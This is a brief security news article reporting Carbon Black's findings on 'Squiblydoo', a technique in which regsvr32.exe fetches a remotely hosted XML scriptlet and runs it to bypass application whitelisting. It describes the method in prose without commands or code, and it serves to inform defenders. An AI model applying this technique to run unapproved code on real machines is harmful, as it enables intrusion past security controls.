Squiblydoo exploits Microsoft OS to remotely run script

Squiblydoo manages to evade detection because the script is hosted remotely and is run by a legitimate Microsoft binary.
Squiblydoo manages to evade detection because the script is hosted remotely and is run by a legitimate Microsoft binary.

Squiblydoo may sound like a crossover episode featuring Squidward and Scooby Doo, but researchers at Carbon Black say Squiblydoo is actually a brand new and very potent exploitation technique.

Carbon Black's report noted that Squiblydoo allows users with normal privileges to execute script on a remote server using Microsoft binaries. Specifically the exploit uses binary regsvr32.exe to download an XML file containing scriptlets that allow the hacker to execute code on the victim's computer.

Squiblydoo manages to evade detection because the script is hosted remotely and is run by a legitimate Microsoft binary.

It is “designed to bypass application whitelisting software by utilizing tools that are built into the operating system by default. In other words, Squiblydoo provides a way for an unapproved scripts to run on a machine that is setup to allow only approved scripts to run,” Carbon Black said.

You must be a registered member of SC Magazine to post a comment.

Sign up to our newsletters

TOP COMMENTS